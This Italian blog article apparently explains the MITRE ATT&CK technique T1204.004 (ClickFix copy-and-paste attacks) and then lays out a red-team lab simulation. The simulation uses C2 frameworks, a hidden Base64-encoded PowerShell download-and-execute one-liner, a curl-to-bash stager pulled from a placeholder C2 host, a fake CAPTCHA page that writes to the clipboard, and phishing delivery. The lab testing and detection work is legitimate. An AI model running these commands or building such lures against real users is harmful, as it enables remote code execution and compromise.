Copia e Incolla Malevolo: Malicious Copy and Paste (T1204.004)

La tecnica Malicious Copy and Paste (T1204.004) sfrutta il social engineering per indurre un utente a copiare e incollare codice malevolo direttamente in un interprete di comandi — PowerShell, CMD, Bash o il dialogo Esegui di Windows. Si colloca nella tattica Execution (TA0002), la fase della kill chain in cui l'avversario ottiene l'esecuzione di codice controllato sul sistema bersaglio.

La variante più nota di questa tecnica è la strategia ClickFix: l'attaccante presenta alla vittima un messaggio di errore fittizio o un CAPTCHA fasullo, accompagnato da istruzioni apparentemente utili che richiedono di aprire un terminale e incollare un comando. Il codice è spesso offuscato — tipicamente in Base64 o con pipeline di download — così da mascherare l'intento reale. Una volta eseguito, stabilisce un punto d'appoggio iniziale sulla macchina.

L'efficacia della tecnica risiede nel bypassare le difese tradizionali: poiché è l'utente stesso ad eseguire il comando, i filtri email, le sandbox del browser e le protezioni sui file scaricati risultano inefficaci. Il vettore può essere una pagina web compromessa (drive-by) oppure un'email di phishing con un allegato che, al tentativo di apertura, mostra un falso errore e suggerisce il "rimedio" malevolo. Ad oggi i dati registrano 1 gruppo APT, 1 software e 3 mitigazioni associate a questa tecnica.


La simulazione della strategia ClickFix in laboratorio è un esercizio prezioso per testare la resilienza degli utenti e la capacità di detection del SOC. L'obiettivo è costruire una catena credibile: pagina web → istruzione sociale → comando offuscato → callback C2.

Preparazione dell'infrastruttura di test. Per il lato server conviene utilizzare un framework C2. Havoc (open source) è direttamente pertinente, dato il suo impiego documentato in catene ClickFix via phishing. In alternativa, Sliver (open source) offre funzionalità analoghe con un setup rapido. Il listener va configurato su HTTPS per simulare uno scenario realistico di egress.

Costruzione del payload offuscato. Il comando che la vittima dovrà incollare deve sembrare innocuo ma concatenare download ed esecuzione. Su Windows, un classico one-liner PowerShell codificato in Base64 è il pattern più comune:

powershell -w hidden -enc <base64_del_payload>

Per generare la stringa Base64 da un comando in chiaro si può usare:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("IEX(New-Object Net.WebClient).DownloadString('<indirizzo_listener_C2>')"))

Su macOS e Linux la catena equivalente sfrutta curl con pipe verso l'interprete:

curl -s <indirizzo_listener_C2>/stage.sh | bash

Creazione della pagina ClickFix. Serve una pagina HTML che simuli un errore del browser o un CAPTCHA. L'elemento chiave è un bottone che, al clic, copi il payload nella clipboard dell'utente tramite l'API JavaScript navigator.clipboard.writeText(). Il messaggio accompagnatorio deve istruire l'utente ad aprire il dialogo Esegui (Win+R) o un terminale e incollare il contenuto. Tool come GoPhish (open source) semplificano la distribuzione via email di phishing, integrandosi con landing page personalizzate.

Variante con allegato email. Si può costruire un documento HTML o PDF che, una volta aperto, mostri un overlay con il falso errore e le istruzioni di copia-incolla. Questa variante testa specificamente i filtri email e le policy DLP.

Alcune accortezze operative per il lab: usare domini interni o con TLD riservati (.test), limitare il callback a reti isolate, e concordare con il Blue Team una finestra di esecuzione. Al termine, il report deve evidenziare quanti utenti hanno eseguito il comando e in quanto tempo il SOC ha generato l'alert — i due KPI fondamentali di questo tipo di engagement.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo